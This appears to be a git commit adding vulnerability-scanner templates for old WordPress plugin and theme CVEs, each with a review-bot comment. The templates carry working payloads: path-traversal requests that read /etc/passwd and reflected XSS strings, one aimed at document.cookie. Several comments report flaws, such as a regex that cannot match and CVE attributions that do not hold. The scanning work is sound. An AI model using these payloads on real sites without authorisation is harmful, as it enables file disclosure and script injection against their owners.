Adding some new templates

main
daffainfo 2021-07-16 08:28:45 +07:00
parent af886c4d8d
commit 80c791830b
33 changed files with 707 additions and 11 deletions

27
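--- a/CVE-2011-1669.yaml
+++ b/CVE-2011-1669.yaml
@@ -0,0 +1,27 @@
+id: CVE-2011-1669
+info:
+name: WP Custom Pages 0.5.0.1 - Local File Inclusion (LFI)
+author: daffainfo
+severity: high
+description: Directory traversal vulnerability in wp-download.php in the WP Custom Pages module 0.5.0.1 for WordPress allows remote attackers to read arbitrary files via ..%2F (encoded dot dot) sequences in the url parameter.
+reference: |
+- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1669
+- https://www.exploit-db.com/exploits/17119
+tags: cve,cve2011,wordpress,wp-plugin,lfi
+requests:
+- method: GET
+path:
+- "{{BaseURL}}/wp-content/plugins/wp-custom-pages/wp-download.php?url=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"
+matchers-condition: and
+matchers:
+- type: regex
+regex:
+- "root:[x*]:0:0"
+- type: status
+status:
+- 200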
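Review bot: `reference: |` opens a literal block scalar, so the two `- https://…` lines under it are loaded as one multi-line string (dashes included) rather than as a list of URLs. If a list is intended, drop the `|` and write `reference:` followed by the two `- ` items as an ordinary sequence. The same form appears in CVE-2015-1000012.yaml, CVE-2015-9480.yaml and CVE-2019-9618.yaml in this commit. Indentation is not visible in this rendering, so confirm against the file itself.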


@ -4,6 +4,7 @@ info:
name: Advanced Text Widget < 2.0.2 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: Cross-site scripting (XSS) vulnerability in advancedtext.php in Advanced Text Widget plugin before 2.0.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the page parameter.
reference: https://nvd.nist.gov/vuln/detail/CVE-2011-4618
tags: cve,cve2011,wordpress,xss,wp-plugin
@ -26,4 +27,4 @@ requests:
- type: status
status:
- 200
- 200


@ -4,6 +4,7 @@ info:
name: GRAND FlAGallery 1.57 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: Cross-site scripting (XSS) vulnerability in facebook.php in the GRAND FlAGallery plugin (flash-album-gallery) before 1.57 for WordPress allows remote attackers to inject arbitrary web script or HTML via the i parameter.
reference: https://nvd.nist.gov/vuln/detail/CVE-2011-4624
tags: cve,cve2011,wordpress,xss,wp-plugin
@ -26,4 +27,4 @@ requests:
- type: status
status:
- 200
- 200


@ -4,6 +4,7 @@ info:
name: Adminimize 1.7.22 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: Cross-site scripting (XSS) vulnerability in adminimize/adminimize_page.php in the Adminimize plugin before 1.7.22 for WordPress allows remote attackers to inject arbitrary web script or HTML via the page parameter.
reference: https://nvd.nist.gov/vuln/detail/CVE-2011-4926
tags: cve,cve2011,wordpress,xss,wp-plugin
@ -26,4 +27,4 @@ requests:
- type: status
status:
- 200
- 200

30
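--- a/CVE-2011-5106.yaml
+++ b/CVE-2011-5106.yaml
@@ -0,0 +1,30 @@
+id: CVE-2011-5106
+info:
+name: WordPress Plugin Flexible Custom Post Type < 0.1.7 - Reflected Cross-Site Scripting (XSS)
+author: daffainfo
+severity: medium
+description: Cross-site scripting (XSS) vulnerability in edit-post.php in the Flexible Custom Post Type plugin before 0.1.7 for WordPress allows remote attackers to inject arbitrary web script or HTML via the id parameter.
+reference: https://nvd.nist.gov/vuln/detail/CVE-2011-5106
+tags: cve,cve2011,wordpress,xss,wp-plugin
+requests:
+- method: GET
+path:
+- '{{BaseURL}}/wp-content/plugins/flexible-custom-post-type/edit-post.php?id=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
+matchers-condition: and
+matchers:
+- type: word
+words:
+- "<script>alert(123)</script>"
+part: body
+- type: word
+part: header
+words:
+- text/html
+- type: status
+status:
+- 200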


@ -4,6 +4,7 @@ info:
name: Alert Before Your Post <= 0.1.1 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: Cross-site scripting (XSS) vulnerability in post_alert.php in Alert Before Your Post plugin, possibly 0.1.1 and earlier, for WordPress allows remote attackers to inject arbitrary web script or HTML via the name parameter.
reference: https://nvd.nist.gov/vuln/detail/CVE-2011-5107
tags: cve,cve2011,wordpress,xss,wp-plugin
@ -26,4 +27,4 @@ requests:
- type: status
status:
- 200
- 200


@ -4,6 +4,7 @@ info:
name: Skysa App Bar 1.04 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: Cross-site scripting (XSS) vulnerability in skysa-official/skysa.php in Skysa App Bar Integration plugin, possibly before 1.04, for WordPress allows remote attackers to inject arbitrary web script or HTML via the submit parameter.
reference: https://nvd.nist.gov/vuln/detail/CVE-2011-5179
tags: cve,cve2011,wordpress,xss,wp-plugin
@ -26,4 +27,4 @@ requests:
- type: status
status:
- 200
- 200


@ -1,9 +1,10 @@
id: CVE-2011-5181
info:
name: ClickDesk Live Support - Live Chat 2.0 - Reflected Cross-Site Scripting (XSS)
name: ClickDesk Live Support Live Chat 2.0 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: Cross-site scripting (XSS) vulnerability in clickdesk.php in ClickDesk Live Support - Live Chat plugin 2.0 for WordPress allows remote attackers to inject arbitrary web script or HTML via the cdwidgetid parameter.
reference: https://nvd.nist.gov/vuln/detail/CVE-2011-5181
tags: cve,cve2011,wordpress,xss,wp-plugin
@ -26,4 +27,4 @@ requests:
- type: status
status:
- 200
- 200


@ -4,6 +4,7 @@ info:
name: Featurific For WordPress 1.6.2 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: Cross-site scripting (XSS) vulnerability in cached_image.php in the Featurific For WordPress plugin 1.6.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the snum parameter.
reference: https://nvd.nist.gov/vuln/detail/CVE-2011-5265
tags: cve,cve2011,wordpress,xss,wp-plugin
@ -26,4 +27,4 @@ requests:
- type: status
status:
- 200
- 200


@ -4,6 +4,7 @@ info:
name: YouSayToo auto-publishing 1.0 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: Cross-site scripting (XSS) vulnerability in yousaytoo.php in YouSayToo auto-publishing plugin 1.0 for WordPress allows remote attackers to inject arbitrary web script or HTML via the submit parameter.
reference: https://nvd.nist.gov/vuln/detail/CVE-2012-0901
tags: cve,cve2012,wordpress,xss,wp-plugin
@ -26,4 +27,4 @@ requests:
- type: status
status:
- 200
- 200


@ -4,6 +4,7 @@ info:
name: WP-FaceThumb 0.1 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: Cross-site scripting (XSS) vulnerability in index.php in the WP-FaceThumb plugin 0.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the pagination_wp_facethumb parameter.
reference: https://nvd.nist.gov/vuln/detail/CVE-2012-2371
tags: cve,cve2012,wordpress,xss,wp-plugin
@ -26,4 +27,4 @@ requests:
- type: status
status:
- 200
- 200

30
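--- a/CVE-2012-4273.yaml
+++ b/CVE-2012-4273.yaml
@@ -0,0 +1,30 @@
+id: CVE-2012-4273
+info:
+name: 2 Click Socialmedia Buttons < 0.34 - Reflected Cross Site Scripting (XSS)
+author: daffainfo
+severity: medium
+description: Cross-site scripting (XSS) vulnerability in libs/xing.php in the 2 Click Social Media Buttons plugin before 0.34 for WordPress allows remote attackers to inject arbitrary web script or HTML via the xing-url parameter.
+reference: https://nvd.nist.gov/vuln/detail/CVE-2012-4273
+tags: cve,cve2012,wordpress,xss,wp-plugin
+requests:
+- method: GET
+path:
+- '{{BaseURL}}/wp-content/plugins/2-click-socialmedia-buttons/libs/xing.php?xing-url=%22%3E%3Cscript%3Ealert%28123%29%3C/script%3E'
+matchers-condition: and
+matchers:
+- type: word
+words:
+- "<script>alert(123)</script>"
+part: body
+- type: word
+part: header
+words:
+- text/html
+- type: status
+status:
+- 200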

30
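--- a/CVE-2012-4768.yaml
+++ b/CVE-2012-4768.yaml
@@ -0,0 +1,30 @@
+id: CVE-2012-4768
+info:
+name: WordPress Plugin Download Monitor < 3.3.5.9 - Reflected Cross-Site Scripting (XSS)
+author: daffainfo
+severity: medium
+description: Cross-site scripting (XSS) vulnerability in the Download Monitor plugin before 3.3.5.9 for WordPress allows remote attackers to inject arbitrary web script or HTML via the dlsearch parameter to the default URI.
+reference: https://nvd.nist.gov/vuln/detail/CVE-2012-4768
+tags: cve,cve2012,wordpress,xss,wp-plugin
+requests:
+- method: GET
+path:
+- '{{BaseURL}}/?dlsearch=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
+matchers-condition: and
+matchers:
+- type: word
+words:
+- "<script>alert(123)</script>"
+part: body
+- type: word
+part: header
+words:
+- text/html
+- type: status
+status:
+- 200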


@ -4,6 +4,7 @@ info:
name: WordPress Integrator 1.32 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: Cross-site scripting (XSS) vulnerability in wp-integrator.php in the WordPress Integrator module 1.32 for WordPress allows remote attackers to inject arbitrary web script or HTML via the redirect_to parameter to wp-login.php.
reference: https://nvd.nist.gov/vuln/detail/CVE-2012-5913
tags: cve,cve2012,wordpress,xss,wp-plugin
@ -26,4 +27,4 @@ requests:
- type: status
status:
- 200
- 200

30
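--- a/CVE-2013-4117.yaml
+++ b/CVE-2013-4117.yaml
@@ -0,0 +1,30 @@
+id: CVE-2013-4117
+info:
+name: WordPress Plugin Category Grid View Gallery 2.3.1 - Reflected Cross-Site Scripting (XSS)
+author: daffainfo
+severity: medium
+description: Cross-site scripting (XSS) vulnerability in includes/CatGridPost.php in the Category Grid View Gallery plugin 2.3.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the ID parameter.
+reference: https://nvd.nist.gov/vuln/detail/CVE-2013-4117
+tags: cve,cve2013,wordpress,xss,wp-plugin
+requests:
+- method: GET
+path:
+- '{{BaseURL}}/wp-content/plugins/category-grid-view-gallery/includes/CatGridPost.php?ID=1%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
+matchers-condition: and
+matchers:
+- type: word
+words:
+- "<script>alert(123)</script>"
+part: body
+- type: word
+part: header
+words:
+- text/html
+- type: status
+status:
+- 200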

30
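--- a/CVE-2013-4625.yaml
+++ b/CVE-2013-4625.yaml
@@ -0,0 +1,30 @@
+id: CVE-2013-4625
+info:
+name: WordPress Plugin Duplicator < 0.4.5 - Reflected Cross-Site Scripting (XSS)
+author: daffainfo
+severity: medium
+description: Cross-site scripting (XSS) vulnerability in files/installer.cleanup.php in the Duplicator plugin before 0.4.5 for WordPress allows remote attackers to inject arbitrary web script or HTML via the package parameter.
+reference: https://nvd.nist.gov/vuln/detail/CVE-2013-4625
+tags: cve,cve2013,wordpress,xss,wp-plugin
+requests:
+- method: GET
+path:
+- '{{BaseURL}}/wp-content/plugins/duplicator/files/installer.cleanup.php?remove=1&package=%3Cscript%3Ealert%28123%29;%3C/script%3E'
+matchers-condition: and
+matchers:
+- type: word
+words:
+- "<script>alert(123);</script>"
+part: body
+- type: word
+part: header
+words:
+- text/html
+- type: status
+status:
+- 200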

30
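--- a/CVE-2014-4513.yaml
+++ b/CVE-2014-4513.yaml
@@ -0,0 +1,30 @@
+id: CVE-2014-4513
+info:
+name: ActiveHelper LiveHelp Server 3.1.0 - Reflected Cross-Site Scripting (XSS)
+author: daffainfo
+severity: medium
+description: Multiple cross-site scripting (XSS) vulnerabilities in server/offline.php in the ActiveHelper LiveHelp Live Chat plugin 3.1.0 and earlier for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) MESSAGE, (2) EMAIL, or (3) NAME parameter.
+reference: https://nvd.nist.gov/vuln/detail/CVE-2014-4513
+tags: cve,cve2014,wordpress,xss,wp-plugin
+requests:
+- method: GET
+path:
+- '{{BaseURL}}/wp-content/plugins/activehelper-livehelp/server/offline.php?MESSAGE=MESSAGE%22%3E%3C/textarea%3E%3Cscript%3Ealert%28123%29%3C/script%3E&DOMAINID=DOMAINID&COMPLETE=COMPLETE&TITLE=TITLE&URL=URL&COMPANY=COMPANY&SERVER=SERVER&PHONE=PHONE&SECURITY=SECURITY&BCC=BCC&EMAIL=EMAIL%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&NAME=NAME%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&'
+matchers-condition: and
+matchers:
+- type: word
+words:
+- "<script>alert(123)</script>"
+part: body
+- type: word
+part: header
+words:
+- text/html
+- type: status
+status:
+- 200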
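Review bot: Only the MESSAGE value is verified here: the body matcher looks for `<script>alert(123)</script>`, while the EMAIL and NAME parameters carry a different `alert(document.cookie)` string that no matcher checks, and the path ends in a dangling `&`. The request should carry only what the matchers confirm, so either trim the path to the MESSAGE parameter (plus whatever fields the page actually requires) or give all three parameters the same inert `alert(123)` marker. A marker that does not reference `document.cookie` is also the better choice for a scanner probe that runs against production sites.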

25
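--- a/CVE-2015-1000012.yaml
+++ b/CVE-2015-1000012.yaml
@@ -0,0 +1,25 @@
+id: CVE-2015-1000012
+info:
+name: MyPixs <= 0.3 - Unauthenticated Local File Inclusion (LFI)
+author: daffainfo
+severity: high
+reference: |
+- https://wpscan.com/vulnerability/24b83ce5-e3b8-4262-b087-a2dfec014985
+- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1000012
+tags: cve,cve2015,wordpress,wp-plugin,lfi
+requests:
+- method: GET
+path:
+- "{{BaseURL}}/wp-content/plugins/mypixs/mypixs/downloadpage.php?url=/etc/passwd"
+matchers-condition: and
+matchers:
+- type: regex
+regex:
+- "root:[0*]:0:0"
+part: body
+- type: status
+status:
+- 200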
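Review bot: The regex `root:[0*]:0:0` cannot match the usual shadowed passwd entry `root:x:0:0:`, because the character class accepts only `0` or `*` in the password field, so a vulnerable host would go unreported. CVE-2011-1669.yaml and CVE-2019-9618.yaml in this same commit use `root:[x*]:0:0`, and this matcher should read `- "root:[x*]:0:0"` as well. The same `[0*]` class is used in CVE-2015-9480.yaml and CVE-2016-10956.yaml. This template and CVE-2015-9480.yaml also carry no `description` field.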

25
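--- a/CVE-2015-9480.yaml
+++ b/CVE-2015-9480.yaml
@@ -0,0 +1,25 @@
+id: CVE-2015-9480
+info:
+name: WordPress Plugin RobotCPA 5 - Directory Traversal
+author: daffainfo
+severity: high
+reference: |
+- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-9480
+- https://www.exploit-db.com/exploits/37252
+tags: cve,cve2015,wordpress,wp-plugin,lfi
+requests:
+- method: GET
+path:
+- "{{BaseURL}}/wp-content/plugins/robotcpa/f.php?l=ZmlsZTovLy9ldGMvcGFzc3dk"
+matchers-condition: and
+matchers:
+- type: regex
+regex:
+- "root:[0*]:0:0"
+part: body
+- type: status
+status:
+- 200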

25
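--- a/CVE-2016-10956.yaml
+++ b/CVE-2016-10956.yaml
@@ -0,0 +1,25 @@
+id: CVE-2016-10956
+info:
+name: Mail Masta 1.0 - Unauthenticated Local File Inclusion (LFI)
+author: daffainfo
+severity: high
+description: The mail-masta plugin 1.0 for WordPress has local file inclusion in count_of_send.php and csvexport.php.
+reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10956
+tags: cve,cve2016,wordpress,wp-plugin,lfi
+requests:
+- method: GET
+path:
+- "{{BaseURL}}/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd"
+- "{{BaseURL}}/wp-content/plugins/mail-masta/inc/lists/csvexport.php?pl=/etc/passwd"
+matchers-condition: and
+matchers:
+- type: regex
+regex:
+- "root:[0*]:0:0"
+part: body
+- type: status
+status:
+- 200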

30
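--- a/CVE-2019-19134.yaml
+++ b/CVE-2019-19134.yaml
@@ -0,0 +1,30 @@
+id: CVE-2019-19134
+info:
+name: Hero Maps Premium < 2.2.3 - Unauthenticated Reflected Cross-Site Scripting (XSS)
+author: daffainfo
+severity: medium
+description: The Hero Maps Premium plugin 2.2.1 and prior for WordPress is prone to unauthenticated XSS via the views/dashboard/index.php p parameter because it fails to sufficiently sanitize user-supplied input - https://wpscan.com/vulnerability/24b83ce5-e3b8-4262-b087-a2dfec014985
+reference: https://wpscan.com/vulnerability/d179f7fe-e3e7-44b3-9bf8-aab2e90dbe01
+tags: cve,cve2019,wordpress,xss,wp-plugin
+requests:
+- method: GET
+path:
+- '{{BaseURL}}/wp-content/plugins/hmapsprem/views/dashboard/index.php?p=/wp-content/plugins/hmapsprem/foo%22%3E%3Csvg//onload=%22alert(123)%22%3E'
+matchers-condition: and
+matchers:
+- type: word
+words:
+- 'foo"><svg//onload="alert(123)">'
+part: body
+- type: word
+part: header
+words:
+- text/html
+- type: status
+status:
+- 200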
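Review bot: The `description` ends with `- https://wpscan.com/vulnerability/24b83ce5-e3b8-4262-b087-a2dfec014985`, which is the URL listed as the MyPixs reference in CVE-2015-1000012.yaml, so it looks like copy-paste residue and should be dropped from the description; the template's own `reference` already points to a different advisory. The affected range is also stated two ways, `< 2.2.3` in `name` and `2.2.1 and prior` in `description`, and one of them should be corrected against the advisory so that operators triaging a finding know which versions are in scope.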

27
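--- a/CVE-2019-9618.yaml
+++ b/CVE-2019-9618.yaml
@@ -0,0 +1,27 @@
+id: CVE-2019-9618
+info:
+name: WordPress Plugin GraceMedia Media Player 1.0 - Local File Inclusion (LFI)
+author: daffainfo
+severity: high
+description: The GraceMedia Media Player plugin 1.0 for WordPress allows Local File Inclusion via the cfg parameter.
+reference: |
+- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9618
+- https://seclists.org/fulldisclosure/2019/Mar/26
+tags: cve,cve2019,wordpress,wp-plugin,lfi
+requests:
+- method: GET
+path:
+- "{{BaseURL}}/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd"
+matchers-condition: and
+matchers:
+- type: regex
+regex:
+- "root:[x*]:0:0"
+- type: status
+status:
+- 200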

30
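--- a/CVE-2020-12054.yaml
+++ b/CVE-2020-12054.yaml
@@ -0,0 +1,30 @@
+id: CVE-2020-12054
+info:
+name: Catch Breadcrumb < 1.5.7 - Unauthenticated Reflected XSS
+author: daffainfo
+severity: medium
+description: The Catch Breadcrumb plugin before 1.5.4 for WordPress allows Reflected XSS via the s parameter (a search query).
+reference: https://wpscan.com/vulnerability/30a83491-2f59-4c41-98bd-a9e6e5a609d4
+tags: cve,cve2020,wordpress,xss,wp-plugin
+requests:
+- method: GET
+path:
+- '{{BaseURL}}/?s=%3Cimg%20src%3Dx%20onerror%3Dalert%28123%29%3B%3E'
+matchers-condition: and
+matchers:
+- type: word
+words:
+- "<img src=x onerror=alert(123);>"
+part: body
+- type: word
+part: header
+words:
+- text/html
+- type: status
+status:
+- 200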
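Review bot: Nothing in this template ties a match to Catch Breadcrumb: the probe is the generic WordPress search `/?s=` and the matchers only confirm that the string comes back in an HTML 200 response, so any site that echoes `s` unescaped is reported under CVE-2020-12054. CVE-2020-17362.yaml has the same shape, and the two files share one `reference` URL (`…/30a83491-2f59-4c41-98bd-a9e6e5a609d4`), which can be correct for at most one of them. An additional body matcher on a plugin-specific string would make the attribution reliable. The version also disagrees within the file: `name` says `< 1.5.7`, `description` says `before 1.5.4`.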

30
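--- a/CVE-2020-17362.yaml
+++ b/CVE-2020-17362.yaml
@@ -0,0 +1,30 @@
+id: CVE-2020-17362
+info:
+name: Nova Lite < 1.3.9 - Unauthenticated Reflected Cross-Site Scripting (XSS)
+author: daffainfo
+severity: medium
+description: search.php in the Nova Lite theme before 1.3.9 for WordPress allows Reflected XSS.
+reference: https://wpscan.com/vulnerability/30a83491-2f59-4c41-98bd-a9e6e5a609d4
+tags: cve,cve2020,wordpress,xss,wp-plugin
+requests:
+- method: GET
+path:
+- '{{BaseURL}}/?s=%3Cimg%20src%20onerror=alert(123)%3E'
+matchers-condition: and
+matchers:
+- type: word
+words:
+- "<img src onerror=alert(123)>"
+part: body
+- type: word
+part: header
+words:
+- text/html
+- type: status
+status:
+- 200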
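Review bot: `tags` includes `wp-plugin`, but the description says Nova Lite is a theme, so tag-filtered runs and reports would file this finding under plugins; `tags: cve,cve2020,wordpress,xss,wp-theme` would fit the description. CVE-2021-24320.yaml and CVE-2021-24335.yaml are likewise described as themes and carry `wp-plugin`.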

30
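--- a/CVE-2021-24298.yaml
+++ b/CVE-2021-24298.yaml
@@ -0,0 +1,30 @@
+id: CVE-2021-24298
+info:
+name: Simple Giveaways < 2.36.2 - Reflected Cross-Site Scripting (XSS)
+author: daffainfo
+severity: medium
+description: The method and share GET parameters of the Giveaway pages were not sanitised, validated or escaped before being output back in the pages, thus leading to reflected XSS
+reference: https://nvd.nist.gov/vuln/detail/CVE-2021-24298
+tags: cve,cve2021,wordpress,xss,wp-plugin
+requests:
+- method: GET
+path:
+- '{{BaseURL}}/giveaway/mygiveaways/?share=%3Cscript%3Ealert(123)%3C/script%3E'
+matchers-condition: and
+matchers:
+- type: word
+words:
+- "<script>alert(123)</script>"
+part: body
+- type: word
+part: header
+words:
+- text/html
+- type: status
+status:
+- 200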

30
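--- a/CVE-2021-24320.yaml
+++ b/CVE-2021-24320.yaml
@@ -0,0 +1,30 @@
+id: CVE-2021-24320
+info:
+name: Bello WordPress Theme < 1.6.0 - Reflected Cross-Site Scripting (XSS)
+author: daffainfo
+severity: medium
+description: The Bello - Directory & Listing WordPress theme before 1.6.0 did not properly sanitise and escape its listing_list_view, bt_bb_listing_field_my_lat, bt_bb_listing_field_my_lng, bt_bb_listing_field_distance_value, bt_bb_listing_field_my_lat_default, bt_bb_listing_field_keyword, bt_bb_listing_field_location_autocomplete, bt_bb_listing_field_price_range_from and bt_bb_listing_field_price_range_to parameter in ints listing page, leading to reflected Cross-Site Scripting issues.
+reference: https://nvd.nist.gov/vuln/detail/CVE-2021-24320
+tags: cve,cve2021,wordpress,xss,wp-plugin
+requests:
+- method: GET
+path:
+- '{{BaseURL}}/listing/?listing_list_view=standard13%22%3E%3Cimg%20src%3Dx%20onerror%3D%28alert%29%28123%29%3B%3E'
+matchers-condition: and
+matchers:
+- type: word
+words:
+- "<img src=x onerror=(alert)(123);>"
+part: body
+- type: word
+part: header
+words:
+- text/html
+- type: status
+status:
+- 200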

30
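--- a/CVE-2021-24335.yaml
+++ b/CVE-2021-24335.yaml
@@ -0,0 +1,30 @@
+id: CVE-2021-24335
+info:
+name: Car Repair Services < 4.0 - Reflected Cross-Site Scripting (XSS)
+author: daffainfo
+severity: medium
+description: The Car Repair Services & Auto Mechanic WordPress theme before 4.0 did not properly sanitise its serviceestimatekey search parameter before outputting it back in the page, leading to a reflected Cross-Site Scripting issue
+reference: https://nvd.nist.gov/vuln/detail/CVE-2021-24335
+tags: cve,cve2021,wordpress,xss,wp-plugin
+requests:
+- method: GET
+path:
+- '{{BaseURL}}/car1/estimateresult/result?s=&serviceestimatekey=%3Cimg%20src%3Dx%20onerror%3Dalert%28123%29%3B%3E'
+matchers-condition: and
+matchers:
+- type: word
+words:
+- "<img src=x onerror=alert(123);>"
+part: body
+- type: word
+part: header
+words:
+- text/html
+- type: status
+status:
+- 200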
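Review bot: The path `/car1/estimateresult/result` looks like a route from one particular installation rather than something the theme guarantees (the `car1` segment in particular; this is inferred, the page does not say where the route comes from), so the template may silently miss sites that run the affected theme under other slugs. A comment above `path:` such as `# route taken from the advisory PoC; site-specific slugs may differ` would tell users that a negative result here does not rule the issue out.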

30
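--- a/CVE-2021-24389.yaml
+++ b/CVE-2021-24389.yaml
@@ -0,0 +1,30 @@
+id: CVE-2021-24389
+info:
+name: FoodBakery < 2.2 - Reflected Cross-Site Scripting (XSS)
+author: daffainfo
+severity: medium
+description: The WP Foodbakery WordPress plugin before 2.2, used in the FoodBakery WordPress theme before 2.2 did not properly sanitize the foodbakery_radius parameter before outputting it back in the response, leading to an unauthenticated Reflected Cross-Site Scripting (XSS) vulnerability.
+reference: https://nvd.nist.gov/vuln/detail/CVE-2021-24389
+tags: cve,cve2021,wordpress,xss,wp-plugin
+requests:
+- method: GET
+path:
+- '{{BaseURL}}/listings/?search_title=&location=&foodbakery_locations_position=filter&search_type=autocomplete&foodbakery_radius=10%22%3E%3Cscript%3Eprompt(123)%3C/script%3E'
+matchers-condition: and
+matchers:
+- type: word
+words:
+- "<script>prompt(123)</script>"
+part: body
+- type: word
+part: header
+words:
+- text/html
+- type: status
+status:
+- 200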

47
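--- a/phpinfo.yaml
+++ b/phpinfo.yaml
@@ -0,0 +1,47 @@
+id: phpinfo-files
+info:
+name: phpinfo Disclosure
+author: pdteam,daffainfo,meme-lord
+severity: low
+tags: config,exposure
+requests:
+- method: GET
+path:
+- "{{BaseURL}}/php.php"
+- "{{BaseURL}}/phpinfo.php"
+- "{{BaseURL}}/info.php"
+- "{{BaseURL}}/infophp.php"
+- "{{BaseURL}}/php_info.php"
+- "{{BaseURL}}/test.php"
+- "{{BaseURL}}/i.php"
+- "{{BaseURL}}/asdf.php"
+- "{{BaseURL}}/pinfo.php"
+- "{{BaseURL}}/phpversion.php"
+- "{{BaseURL}}/time.php"
+- "{{BaseURL}}/index.php"
+- "{{BaseURL}}/temp.php"
+- "{{BaseURL}}/old_phpinfo.php"
+- "{{BaseURL}}/infos.php"
+- "{{BaseURL}}/linusadmin-phpinfo.php"
+- "{{BaseURL}}/php-info.php"
+matchers-condition: and
+matchers:
+- type: word
+words:
+- "PHP Extension"
+- "PHP Version"
+condition: and
+- type: status
+status:
+- 200
+extractors:
+- type: regex
+part: body
+group: 1
+regex:
+- '>PHP Version <\/td><td class="v">([0-9.]+)'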
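Review bot: The request lists 17 candidate paths with no `stop-at-first-match: true`, so every path is requested even after a phpinfo page has been found, and a host that exposes several of them yields repeated findings for the same issue. Adding that key at the request level, next to `matchers-condition`, keeps the probe to the minimum traffic needed. The word matcher also relies on the default part; writing `part: body` there would make it explicit, as the extractor already does.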

30
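--- a/wp-custom-tables-xss.yaml
+++ b/wp-custom-tables-xss.yaml
@@ -0,0 +1,30 @@
+id: wp-custom-tables-xss
+info:
+name: WordPress Custom Tables Plugin 3.4.4 - Reflected Cross Site Scripting (XSS)
+author: daffainfo
+severity: medium
+description: WordPress custom tables Plugin 'key' Parameter Cross Site Scripting Vulnerability
+reference: https://www.securityfocus.com/bid/54326/info
+tags: wordpress,xss,wp-plugin
+requests:
+- method: GET
+path:
+- '{{BaseURL}}/wp-content/plugins/custom-tables/iframe.php?s=1&key=%22%3E%3Cscript%3Ealert%28123%29%3C/script%3E'
+matchers-condition: and
+matchers:
+- type: word
+words:
+- "<script>alert(123)</script>"
+part: body
+- type: word
+part: header
+words:
+- text/html
+- type: status
+status:
+- 200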

29
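--- a/wp-flagem-xss.yaml
+++ b/wp-flagem-xss.yaml
@@ -0,0 +1,29 @@
+id: wp-flagem-xss
+info:
+name: WordPress Plugin FlagEm - Reflected Cross-Site Scripting (XSS)
+author: daffainfo
+severity: medium
+reference: https://www.exploit-db.com/exploits/38674
+tags: wordpress,xss,wp-plugin
+requests:
+- method: GET
+path:
+- '{{BaseURL}}/wp-content/plugins/FlagEm/flagit.php?cID=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
+matchers-condition: and
+matchers:
+- type: word
+words:
+- "<script>alert(123)</script>"
+part: body
+- type: word
+part: header
+words:
+- text/html
+- type: status
+status:
+- 200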
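Review bot: This template has no `description`, so a finding gives the operator only the title and an exploit-db link, whereas the other XSS templates in this commit name the vulnerable file and parameter. A line such as `description: Reflected XSS in flagit.php in the FlagEm plugin for WordPress via the cID parameter.` (both names are visible in the path) would bring it in line with them. wp-nextgen-xss.yaml and wp-slideshow-xss.yaml are missing the field too.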

29
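--- a/wp-nextgen-xss.yaml
+++ b/wp-nextgen-xss.yaml
@@ -0,0 +1,29 @@
+id: wp-nextgen-xss
+info:
+name: WordPress Plugin NextGEN Gallery 1.9.10 - Reflected Cross-Site Scripting (XSS)
+author: daffainfo
+severity: medium
+reference: https://www.securityfocus.com/bid/57200/info
+tags: wordpress,xss,wp-plugin
+requests:
+- method: GET
+path:
+- '{{BaseURL}}/wp-content/plugins/nextgen-gallery/nggallery.php?test-head=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
+matchers-condition: and
+matchers:
+- type: word
+words:
+- "<script>alert(123)</script>"
+part: body
+- type: word
+part: header
+words:
+- text/html
+- type: status
+status:
+- 200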

32
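--- a/wp-slideshow-xss.yaml
+++ b/wp-slideshow-xss.yaml
@@ -0,0 +1,32 @@
+id: wp-slideshow-xss
+info:
+name: WordPress Plugin Slideshow - Reflected Cross-Site Scripting (XSS)
+author: daffainfo
+severity: medium
+reference: https://www.exploit-db.com/exploits/37948
+tags: wordpress,xss,wp-plugin
+requests:
+- method: GET
+path:
+- '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php?randomId=%22%3B%3E%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E'
+- '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php?slides[0][type]=text&slides[0][title]=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E'
+- '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/settings.php?settings[][group]=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E'
+- '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/style-settings.php?settings[0]&inputFields[0]=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E'
+matchers-condition: and
+matchers:
+- type: word
+words:
+- "<script>alert(123);</script>"
+part: body
+- type: word
+part: header
+words:
+- text/html
+- type: status
+status:
+- 200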